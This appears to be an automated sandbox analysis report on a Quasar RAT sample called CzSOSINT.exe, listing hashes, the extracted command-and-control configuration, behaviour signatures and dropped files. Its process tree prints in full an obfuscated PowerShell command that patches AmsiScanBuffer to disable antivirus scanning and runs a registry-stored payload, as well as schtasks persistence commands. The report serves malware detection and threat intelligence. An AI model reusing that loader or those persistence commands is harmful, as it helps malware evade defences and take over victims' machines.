quasar | 31f0e68a0fb8a6e1714ade7379d486d56aa1421d2f22ff3d632c1fe24f59457a

Analysis

max time kernel
28s
max time network
31s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
25/04/2024, 22:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CzSOSINT.exe
Size

297KB
MD5

311c6835775d900f12ece1d138aee2a6
SHA1

95ea06961562ddfa77f645be03f95d08d1cdb2e0
SHA256

31f0e68a0fb8a6e1714ade7379d486d56aa1421d2f22ff3d632c1fe24f59457a
SHA512

19cc40219e209fc878ea2beb5cb81917cd3bf43684d9c1d42643581c38b5db393ae8c2362d167521002e466a80fe24b08163aefda5aa7d266b4731f5c985d500
SSDEEP

6144:9eQCIpHePBK7UOYz1mhJCtWY9XcNfPHDpu74NpgtcZRg/+wPO:0ae5mYzcLC0YuF8kHX/g/

Score

10^/10

quasar rslavereel spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

RSlaveReel

147.185.221.19:33587

Mutex

$Sxr-PODin6zbdvLuVkqKla

Attributes

encryption_key
myaDwGp04jmlN7Zrz509
install_name
WindowsDllRunHost.exe
log_directory
Update Logs
reconnect_delay
3000
startup_key
WindowsBIOSUpdx64
subdirectory
orbitpaid

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023266-18.dat	family_quasar
behavioral2/memory/416-28-0x0000000000CF0000-0x0000000000D5C000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3308 created 632	3308	powershell.EXE	5

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	CzSOSINT.exe

Executes dropped EXE 4 IoCs

pid	Process
3760	IDTOIPBYR_0.exe
416	Update.exe
5936	WindowsDllRunHost.exe
6016	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
32	raw.githubusercontent.com
33	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3308 set thread context of 3476	3308	powershell.EXE	111

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1796	schtasks.exe
5512	SCHTASKS.exe
1056	schtasks.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
3308	powershell.EXE
3308	powershell.EXE
3308	powershell.EXE
3308	powershell.EXE
3476	dllhost.exe
3476	dllhost.exe
3476	dllhost.exe
3476	dllhost.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	416	Update.exe
Token: SeDebugPrivilege	3308	powershell.EXE
Token: SeDebugPrivilege	5936	WindowsDllRunHost.exe
Token: SeDebugPrivilege	3308	powershell.EXE
Token: SeDebugPrivilege	3476	dllhost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5936	WindowsDllRunHost.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 500 wrote to memory of 3760	500	CzSOSINT.exe	91
PID 500 wrote to memory of 3760	500	CzSOSINT.exe	91
PID 500 wrote to memory of 416	500	CzSOSINT.exe	92
PID 500 wrote to memory of 416	500	CzSOSINT.exe	92
PID 500 wrote to memory of 416	500	CzSOSINT.exe	92
PID 416 wrote to memory of 1796	416	Update.exe	97
PID 416 wrote to memory of 1796	416	Update.exe	97
PID 416 wrote to memory of 1796	416	Update.exe	97
PID 416 wrote to memory of 5936	416	Update.exe	99
PID 416 wrote to memory of 5936	416	Update.exe	99
PID 416 wrote to memory of 5936	416	Update.exe	99
PID 416 wrote to memory of 6016	416	Update.exe	101
PID 416 wrote to memory of 6016	416	Update.exe	101
PID 416 wrote to memory of 6016	416	Update.exe	101
PID 416 wrote to memory of 5512	416	Update.exe	102
PID 416 wrote to memory of 5512	416	Update.exe	102
PID 416 wrote to memory of 5512	416	Update.exe	102
PID 5936 wrote to memory of 1056	5936	WindowsDllRunHost.exe	107
PID 5936 wrote to memory of 1056	5936	WindowsDllRunHost.exe	107
PID 5936 wrote to memory of 1056	5936	WindowsDllRunHost.exe	107
PID 3308 wrote to memory of 3476	3308	powershell.EXE	111
PID 3308 wrote to memory of 3476	3308	powershell.EXE	111
PID 3308 wrote to memory of 3476	3308	powershell.EXE	111
PID 3308 wrote to memory of 3476	3308	powershell.EXE	111
PID 3308 wrote to memory of 3476	3308	powershell.EXE	111
PID 3308 wrote to memory of 3476	3308	powershell.EXE	111
PID 3308 wrote to memory of 3476	3308	powershell.EXE	111
PID 3308 wrote to memory of 3476	3308	powershell.EXE	111
PID 3476 wrote to memory of 632	3476	dllhost.exe	5
PID 3476 wrote to memory of 692	3476	dllhost.exe	7
PID 3476 wrote to memory of 960	3476	dllhost.exe	12

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5aec0851-2f10-4bf7-8864-d4fd738aabaf}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3476

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\CzSOSINT.exe
"C:\Users\Admin\AppData\Local\Temp\CzSOSINT.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:500
- C:\Users\Admin\AppData\Local\Temp\IDTOIPBYR_0.exe
  "C:\Users\Admin\AppData\Local\Temp\IDTOIPBYR_0.exe"
  2⤵
  - Executes dropped EXE
  PID:3760
- C:\Users\Admin\AppData\Local\Temp\Update.exe
  "C:\Users\Admin\AppData\Local\Temp\Update.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:416
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "WindowsBIOSUpdx64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Update.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:1796
- - C:\Users\Admin\AppData\Roaming\orbitpaid\WindowsDllRunHost.exe
    "C:\Users\Admin\AppData\Roaming\orbitpaid\WindowsDllRunHost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:5936
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "WindowsBIOSUpdx64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\orbitpaid\WindowsDllRunHost.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:1056
- - C:\Users\Admin\AppData\Local\Temp\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    3⤵
    - Executes dropped EXE
    PID:6016
- - C:\Windows\SysWOW64\SCHTASKS.exe
    "SCHTASKS.exe" /create /tn "$77Update.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Update.exe'" /sc onlogon /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:liifKRLHrTPk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$BdkMDZGfIxYVhp,[Parameter(Position=1)][Type]$JLklNrVkNe)$zXADCPWctIY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e',$False).DefineType('My'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'A'+'n'+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$zXADCPWctIY.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'ia'+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+'S'+'ig'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$BdkMDZGfIxYVhp).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+'ed');$zXADCPWctIY.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](72)+'i'+'d'+'e'+'B'+''+'y'+'S'+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$JLklNrVkNe,$BdkMDZGfIxYVhp).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $zXADCPWctIY.CreateType();}$NXGlxWnOOxtey=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+'i'+''+[Char](110)+'3'+'2'+''+'.'+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+''+'e'+''+'N'+'ati'+'v'+'eMet'+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$QCmRWQaryVIcOS=$NXGlxWnOOxtey.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'oc'+[Char](65)+''+[Char](100)+'dr'+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+'bl'+[Char](105)+''+[Char](99)+','+'S'+'t'+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gWmxTNNDEJXBTVLTQbf=liifKRLHrTPk @([String])([IntPtr]);$sHGKrAsGozMqpmzoaZCFdf=liifKRLHrTPk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gHywEfgEDZM=$NXGlxWnOOxtey.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+'u'+'le'+'H'+'a'+'n'+'dl'+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+'32'+'.'+'d'+[Char](108)+'l')));$NEGsDCTDcvZlnl=$QCmRWQaryVIcOS.Invoke($Null,@([Object]$gHywEfgEDZM,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+'b'+''+'r'+''+'a'+''+[Char](114)+''+'y'+'A')));$cdpHoPhvcABoyYVPV=$QCmRWQaryVIcOS.Invoke($Null,@([Object]$gHywEfgEDZM,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$drgtOFb=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NEGsDCTDcvZlnl,$gWmxTNNDEJXBTVLTQbf).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$REgKxNVwXLnydMfrl=$QCmRWQaryVIcOS.Invoke($Null,@([Object]$drgtOFb,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+'S'+'c'+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+'r'+'')));$HOQopUyTma=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cdpHoPhvcABoyYVPV,$sHGKrAsGozMqpmzoaZCFdf).Invoke($REgKxNVwXLnydMfrl,[uint32]8,4,[ref]$HOQopUyTma);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$REgKxNVwXLnydMfrl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cdpHoPhvcABoyYVPV,$sHGKrAsGozMqpmzoaZCFdf).Invoke($REgKxNVwXLnydMfrl,[uint32]8,0x20,[ref]$HOQopUyTma);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+'t'+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IDTOIPBYR_0.exe

Filesize
139KB

MD5
224ce6bc7b94e1843e1f1623d856e93b

SHA1
5a28a76369bc15982f0ba95c79e74c496db0df14

SHA256
7d520ade71bbd117074f1c071c68021edbf8c0ff79729cdca6a556eac338bafd

SHA512
6508be341f8b224657f288c543ee1bc99895d03d9fe0f27fdfbbe39261d6683555e53592f25ba0f523d74a84dbba39e1f86e18d9173c3820c1c8df3c01817ff6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe

Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Update.exe

Filesize
409KB

MD5
b551c695865c6d7f51346d324f7d4604

SHA1
dc8cc6bf41bf725fb8747c21d264dd7d9ec5ad72

SHA256
bb450aec5b543dd30c3ce33c731340a3c601afa75ca2670dfc0bf547be064dd0

SHA512
6a7cf624887b19fceb7f08dd06965c1a4ca8b07390447a411ef60738070ab19258d4ad96b489782b0f3e46c1e153e27293d2725123af72c57dd112bc61d51ba1

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_jgz3oi4b.rne.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/416-27-0x0000000074DA0000-0x0000000075550000-memory.dmp

Filesize
7.7MB

Download
memory/416-47-0x0000000074DA0000-0x0000000075550000-memory.dmp

Filesize
7.7MB

Download
memory/416-34-0x00000000069C0000-0x00000000069FC000-memory.dmp

Filesize
240KB

Download
memory/416-28-0x0000000000CF0000-0x0000000000D5C000-memory.dmp

Filesize
432KB

Download
memory/416-29-0x0000000005C30000-0x00000000061D4000-memory.dmp

Filesize
5.6MB

Download
memory/416-30-0x00000000057A0000-0x0000000005832000-memory.dmp

Filesize
584KB

Download
memory/416-31-0x0000000005790000-0x00000000057A0000-memory.dmp

Filesize
64KB

Download
memory/416-32-0x0000000005940000-0x00000000059A6000-memory.dmp

Filesize
408KB

Download
memory/416-33-0x0000000006580000-0x0000000006592000-memory.dmp

Filesize
72KB

Download
memory/500-25-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/500-2-0x000000001AEC0000-0x000000001AED0000-memory.dmp

Filesize
64KB

Download
memory/500-1-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

Filesize
10.8MB

Download
memory/500-0-0x0000000000050000-0x00000000000A0000-memory.dmp

Filesize
320KB

Download
memory/632-83-0x000001E3A20B0000-0x000001E3A20DB000-memory.dmp

Filesize
172KB

Download
memory/632-82-0x000001E3A20B0000-0x000001E3A20DB000-memory.dmp

Filesize
172KB

Download
memory/632-81-0x000001E3A2080000-0x000001E3A20A5000-memory.dmp

Filesize
148KB

Download
memory/3308-49-0x000001C8E4A30000-0x000001C8E4A40000-memory.dmp

Filesize
64KB

Download
memory/3308-50-0x000001C8E4A30000-0x000001C8E4A40000-memory.dmp

Filesize
64KB

Download
memory/3308-60-0x000001C8E4A80000-0x000001C8E4AA2000-memory.dmp

Filesize
136KB

Download
memory/3308-61-0x000001C8E4A30000-0x000001C8E4A40000-memory.dmp

Filesize
64KB

Download
memory/3308-48-0x00007FFD83940000-0x00007FFD84401000-memory.dmp

Filesize
10.8MB

Download
memory/3308-64-0x000001C8FF3F0000-0x000001C8FF41A000-memory.dmp

Filesize
168KB

Download
memory/3308-65-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/3308-66-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/3476-73-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3476-71-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3476-69-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3476-68-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3476-67-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3476-74-0x00007FFDA2A10000-0x00007FFDA2C05000-memory.dmp

Filesize
2.0MB

Download
memory/3476-75-0x00007FFDA1380000-0x00007FFDA143E000-memory.dmp

Filesize
760KB

Download
memory/3476-76-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/5936-63-0x0000000007010000-0x000000000701A000-memory.dmp

Filesize
40KB

Download
memory/5936-41-0x00000000057E0000-0x00000000057F0000-memory.dmp

Filesize
64KB

Download
memory/5936-40-0x0000000074DA0000-0x0000000075550000-memory.dmp

Filesize
7.7MB

Download